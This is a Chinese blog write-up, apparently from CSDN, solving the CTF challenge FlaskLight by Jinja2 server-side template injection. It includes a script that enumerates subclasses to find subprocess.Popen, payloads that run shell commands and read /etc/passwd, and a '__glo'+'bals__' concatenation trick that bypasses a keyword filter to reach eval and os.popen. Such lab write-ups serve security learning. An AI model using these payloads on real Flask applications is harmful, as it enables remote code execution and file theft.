[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤

最新推荐文章于 2024-06-15 17:27:28 发布
最新推荐文章于 2024-06-15 17:27:28 发布
阅读量731 收藏
点赞数
分类专栏: BUUctf 文章标签: 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133344880
版权

目录

subprocess.Popen

FILE

warnings.catch_warnings

site._Printer


这题很明显就是 SSTI了

源代码

我们试试看

{{7*7}}

然后我们就开始吧

原本我的想法是直接{{url_for.__globals__}}

但是回显是直接500 猜测过滤 我们正常来吧

{{"".__class__}}  查看当前情况

{{"".__class__.__base__}} 查看基类 这里发现没有利用的 我们修改代码

{{"".__class__.__mro__}}  查看全部类  发现存在<type 'object'>了



{{"".__class__.__mro__[2].__subclasses__()}}  查看object的子类

这里我们需要 os 来调用

但是这里存在一个类 可以不需要os

subprocess.Popen

Python3 subprocess | 菜鸟教程

需要参数

("命令",shell=True,stdout=-1)

这里 stdout  就是指定输出 PIPE

然后我们可以使用 其方法来进行交互

("命令",shell=True,stdout=-1).communicate()

这样我们就可以实现rce

首先通过 脚本跑出来其的位数

import time

import  requests

base_url="http://1a3ad76d-35d3-4a35-97fb-8997c87bf989.node4.buuoj.cn:81/?search="

for i in range(300):
    payload="{{\"\".__class__.__mro__[2].__subclasses__()[%s]}}"%i
    r = requests.get(url=base_url + payload)
    if "subprocess.Popen" in r.text:
        print(i)
    if r.status_code == 429:
        time.sleep(0.5)

跑出来是258

我们开始构造

?search={{''.__class__.__mro__[2].__subclasses__()[258]("ls",shell=True,stdout=-1).communicate()[0].strip()}}

最后的.communicate()[0].strip() 通过 communicate方法 输出 并且指定数组 去除空白符

我们看看 flasklight看看

?search={{''.__class__.__mro__[2].__subclasses__()[258]("cat /flasklight/coomme_geeeett_youur_flek",shell=True,stdout=-1).communicate()[0].strip()}}

FILE

这是另一个方法 通过file读取文件

首先我们要测试一下

先查找一下 file

发现是40

然后我们看看

{{"".__class__.__mro__[2].__subclasses__()[40]}}
/?search={{"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()}}

读取成功

然后我们去读一下命令行吧

发现读出了路径

我们看看这个py

但是还是没有办法直接读取出来 因为不知道flag的文件名字

warnings.catch_warnings

我们首先找一下这个类的位数

59

{{"".__class__.__mro__[2].__subclasses__()[59].__init__}}

这里就卡住了 因为我们还是需要 globals的参与

我们如何绕过过滤呢

{{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']}}

这样就可以

我们在上面也知道 是通过匹配过滤的

做到这个我们其实就可以正常rce了 但是还是完善一下这个类的用法吧

这里我们能发现 这个类没有加载 os 需要我们手动加载

我们需要在其

['__builtins__']['eval']

 下导入

payload

?search={{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

这样就借助 os 实现了 rce

site._Printer

我们知道了 globals可以拼接绕过

这个方法也可以实现我们看看里面是否内置了 os

?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']}}

发现存在 我们直接rce即可

?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}

最后读取即可

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GN_Qual_Download_Tool_User_V4.0.5.2.zip
05-20
高通8976线刷平台
Qual_a_idade_do_seu_gatinho
04-08
#Conversion immersion.dev 这是我们专注于任何编程语言的第一个主要工具的项目:变量,运算符,以及用于与用户交换屏幕上的第一条消息的警报和提示功能。 上完课后,我重新访问了该项目并进行了改进,例如添加了...
[CSCCTF 2019 Qual]FlaskLight
qq_35231971的博客
08-09 1122
[CSCCTF 2019 Qual]FlaskLight
[CSCCTF 2019 Qual]FlaskLight——直取flag?
Mrs_H的博客
11-16 2173
[CSCCTF 2019 Qual]FlaskLight 前言 白天一直在上课,晚上赶快躲进图书馆里面打打靶场。这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强了。我根本就没有考虑这些,就直接去找flag了。 正文 很喜欢这样的题目,在每一步之后出题人都会贴心的留下下一步的线索,不至于做完第一步后,不知道自己在干嘛,甚至是不知道自己第一步做对了没有。打开题目 出题人让我们用get进行传参,向这个网站里面传一个search进去。我们尝试之后发现这个地方存在SSTI。
[CSCCTF 2019 Qual]FlaskLight SSTI注入
qq_54929891的博客
04-05 2281
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49,既然我们可以利用{{}},又有输出点,直接模板注入GOGOGO python-flask模块注入(SSTI) - ctrl_TT豆 - 博客园因为不太熟,只能一步步来 ''.__class__ //先随便查看一个字符所属的类是什么 ''.__class__.__mro__ //返回...
一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI
sGanYu
07-29 1619
做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是太少了,额也有可能是大佬觉得没有必要讲,不过在这里还是记录一下自己的一些解题思路,一方面也是防止自己忘记,可能会有错误,欢迎前来指正。.........
ssti模板注入jinja2 之[CSCCTF 2019 Qual]FlaskLight
qq_58970968的博客
08-30 289
其中第一条payload中的[id]可以替换成命令,如ls,cat等,第二条payload的[filename]也可替换成文件名称.返回7777777是一般是jinja2。关于绕过,如果禁用了_globlas_
[CSCCTF 2019 Qual] FlaskLight
Welcome To Myon'Blog !
07-04 290
[CSCCTF 2019 Qual] FlaskLight; SSTI模块注入; 利用subprocess.Popen类实现命令执行
[CSCCTF 2019 Qual]FlaskLight ---不会编程的崽
不会编程的崽的博客
03-18 469
python jiaja2模板注入
buuctf_练[CSCCTF 2019 Qual]FlaskLight
m0_66225311的博客
10-27 673
内置函数的过滤,`globals`变量的过滤,调用内部变量或函数的OS函数进行命令执行
CSCCTF-2019-Qual-FlaskLight
Tajang的大千世界
02-09 290
CTF
Qual_Matrix.7z.003
08-17
Qual_Matrix.7z.003 Qual_Matrix.7z.003
人脸图像特征提取matlab代码-jcs_qual:jcs_qual
05-22
人脸图像特征提取matlab代码
Qual_Matrix.7z.002
08-17
Qual_Matrix.7z.002 Qual_Matrix.7z.002
百度网盘限速解决办法
生活在别处
06-13 3665
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
服务器远程桌面经常连接不上,造成远程桌面连接不上的原因都有哪些
最新发布
day3ZY的博客
06-15 416
防火墙和安全软件在保护服务器免受恶意攻击的同时,也可能误判正常的远程连接请求,导致连接被阻止。例如,如果远程桌面服务未启用,或者远程桌面端口被占用或配置错误,都可能导致连接失败。此外,如果服务器上安装了安全类软件,且未正确配置以允许远程桌面连接,也可能导致连接问题。例如,服务器可能遭受DDOS攻击,导致流量超出防御峰值,IP被封锁,进而无法远程连接。服务器远程桌面连接不稳定或经常连接不上是一个较为常见的技术问题,其可能的原因涉及多个层面,包括网络设置、服务器配置、系统安全等方面。
DELL服务器插入新磁盘、创建虚拟磁盘、挂载磁盘步骤
Clang’s Blog
06-15 544
分区磁盘 sudo fdisk /dev/sdb # 格式化分区 sudo mkfs.ext4 /dev/sdb1 # 创建挂载点 sudo mkdir /mnt/newdisk # 挂载分区 sudo mount /dev/sdb1 /mnt/newdisk # 编辑 fstab 以实现持久挂载 sudo nano /etc/fstab这样就可以将新磁盘(sdb)挂载到,并且每次重启后它都会自动挂载在那里。
计算机网络(6) ICMP协议
qq_42761215的博客
06-14 416
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
芯片process qual
09-12
芯片的过程质量(process qual)是指在芯片生产过程中,确保芯片制造质量的一系列措施和评估。芯片生产过程需要通过严格的工艺控制和可靠性测试,以确保最终产品的性能和品质符合设计要求。 首先,芯片的过程质量...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值